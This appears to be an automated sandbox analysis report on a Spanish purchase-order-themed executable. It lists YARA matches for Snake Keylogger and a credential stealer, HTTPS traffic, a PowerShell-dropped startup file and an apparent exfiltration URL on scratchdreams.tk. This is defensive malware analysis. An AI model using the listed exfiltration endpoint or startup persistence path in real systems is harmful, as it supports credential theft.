Source: RegSvcs.exe, 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2537070598.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: RegSvcs.exe, 00000010.00000002.2537070598.0000000002C32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49728 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.RegSvcs.exe.3a94698.3.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.RegSvcs.exe.5160000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.RegSvcs.exe.3a94698.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.RegSvcs.exe.2a55230.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.RegSvcs.exe.5160000.6.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.3b49528.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.3b28af8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.3b28af8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.3b49528.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.2a57a70.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000009.00000002.1422193050.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1414987538.0000000003AE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.2532294899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 8160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 8160, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe

Jump to dropped file

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB1146CC91	3_2_00007FFB1146CC91
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB1146C2A3	3_2_00007FFB1146C2A3
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB1146FE40	3_2_00007FFB1146FE40
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB1146356D	3_2_00007FFB1146356D
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB1146D218	3_2_00007FFB1146D218
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB11472610	3_2_00007FFB11472610
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB1146C7A3	3_2_00007FFB1146C7A3
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Code function: 3_2_00007FFB11690002	3_2_00007FFB11690002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0298E278	9_2_0298E278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02989840	9_2_02989840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0298D818	9_2_0298D818
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0810B8E8	13_2_0810B8E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0810B8E8	13_2_0810B8E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0817B8E8	13_2_0817B8E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0817CDB8	13_2_0817CDB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0817C180	13_2_0817C180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_081764D0	13_2_081764D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_081764C0	13_2_081764C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0819E228	13_2_0819E228
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08198A90	13_2_08198A90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08198A80	13_2_08198A80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08190013	13_2_08190013
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0819E218	13_2_0819E218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08275238	13_2_08275238
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0827C798	13_2_0827C798
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0828F108	13_2_0828F108
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0828FA40	13_2_0828FA40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0828DCE8	13_2_0828DCE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082894E8	13_2_082894E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08288788	13_2_08288788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08287F80	13_2_08287F80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082A3A40	13_2_082A3A40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082C0080	13_2_082C0080
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082C3188	13_2_082C3188
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082CEB10	13_2_082CEB10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082CEB40	13_2_082CEB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082C5440	13_2_082C5440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082C5CA0	13_2_082C5CA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082C3C88	13_2_082C3C88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082C46A8	13_2_082C46A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082E2380	13_2_082E2380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082ED760	13_2_082ED760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082E0BE0	13_2_082E0BE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082E0BCC	13_2_082E0BCC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082E8408	13_2_082E8408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082EA458	13_2_082EA458
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082E7DB0	13_2_082E7DB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082E2DFD	13_2_082E2DFD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082EBDD0	13_2_082EBDD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082E9E1B	13_2_082E9E1B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082E0698	13_2_082E0698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082EC6F8	13_2_082EC6F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_082ED752	13_2_082ED752
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08369028	13_2_08369028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_083601C0	13_2_083601C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08367260	13_2_08367260
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08363D58	13_2_08363D58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08360D48	13_2_08360D48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08364600	13_2_08364600
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0817E798	13_2_0817E798
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0817E787	13_2_0817E787
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08190040	13_2_08190040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0828B839	13_2_0828B839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE0FC8	16_2_00DE0FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE54E8	16_2_00DE54E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE5BB8	16_2_00DE5BB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEE778	16_2_00DEE778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE52C8	16_2_00DE52C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEDEC8	16_2_00DEDEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DED1C0	16_2_00DED1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEA1F8	16_2_00DEA1F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEBBF9	16_2_00DEBBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE94F0	16_2_00DE94F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEAEF0	16_2_00DEAEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEA1EC	16_2_00DEA1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE94E0	16_2_00DE94E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE9098	16_2_00DE9098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEAA98	16_2_00DEAA98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE9D94	16_2_00DE9D94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE908B	16_2_00DE908B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEC4B8	16_2_00DEC4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE0FB9	16_2_00DE0FB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEDEB9	16_2_00DEDEB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEB7B0	16_2_00DEB7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DED1B0	16_2_00DED1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEAAA8	16_2_00DEAAA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEC4A8	16_2_00DEC4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE9DA0	16_2_00DE9DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEB7A0	16_2_00DEB7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEB358	16_2_00DEB358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DECD58	16_2_00DECD58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEA650	16_2_00DEA650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEC051	16_2_00DEC051
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE9948	16_2_00DE9948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEB349	16_2_00DEB349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE4B40	16_2_00DE4B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE8C40	16_2_00DE8C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEA640	16_2_00DEA640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEDA70	16_2_00DEDA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DECD68	16_2_00DECD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEC060	16_2_00DEC060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEDA61	16_2_00DEDA61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DED618	16_2_00DED618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEC910	16_2_00DEC910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEE310	16_2_00DEE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEC90B	16_2_00DEC90B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEBC08	16_2_00DEBC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DED609	16_2_00DED609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEAF00	16_2_00DEAF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE9938	16_2_00DE9938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE4B30	16_2_00DE4B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DE8C2F	16_2_00DE8C2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00DEE320	16_2_00DEE320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E481E8	16_2_00E481E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E4A168	16_2_00E4A168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E463F0	16_2_00E463F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E494C8	16_2_00E494C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E4A7B8	16_2_00E4A7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E48830	16_2_00E48830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E47B98	16_2_00E47B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E49B18	16_2_00E49B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E45D98	16_2_00E45D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E48E78	16_2_00E48E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E4AE00	16_2_00E4AE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E45080	16_2_00E45080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E45090	16_2_00E45090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E40040	16_2_00E40040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E40006	16_2_00E40006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E431F0	16_2_00E431F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E43200	16_2_00E43200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E44360	16_2_00E44360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E44350	16_2_00E44350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E454E8	16_2_00E454E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E454D8	16_2_00E454D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E43648	16_2_00E43648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E43658	16_2_00E43658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E447E0	16_2_00E447E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E447DD	16_2_00E447DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E45940	16_2_00E45940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E42928	16_2_00E42928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E45930	16_2_00E45930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E42918	16_2_00E42918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E43AA0	16_2_00E43AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E43AB0	16_2_00E43AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E41BC0	16_2_00E41BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E47B89	16_2_00E47B89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E40B48	16_2_00E40B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E40B38	16_2_00E40B38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E49B09	16_2_00E49B09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E44C27	16_2_00E44C27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E44C38	16_2_00E44C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E4ADF1	16_2_00E4ADF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E42DA8	16_2_00E42DA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E45D88	16_2_00E45D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E42D98	16_2_00E42D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E43EF8	16_2_00E43EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E40EC0	16_2_00E40EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00E43F08	16_2_00E43F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_02916158	16_2_02916158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_029135C8	16_2_029135C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_029169F0	16_2_029169F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0291E690	16_2_0291E690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_02915CD0	16_2_02915CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_02915CC0	16_2_02915CC0

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7596 -s 1620

Source: NUEVA ORDEN DE COMPRAsxlx..exe

Static PE information: No import functions for PE file found

Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1488764594.0000014F10011000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUxaqilokuqowuyowe4 vs NUEVA ORDEN DE COMPRAsxlx..exe
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1488764594.0000014F10011000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePizzaLarge.exe0 vs NUEVA ORDEN DE COMPRAsxlx..exe
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1495869051.0000014F7A3C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNativeMethods.dll" vs NUEVA ORDEN DE COMPRAsxlx..exe
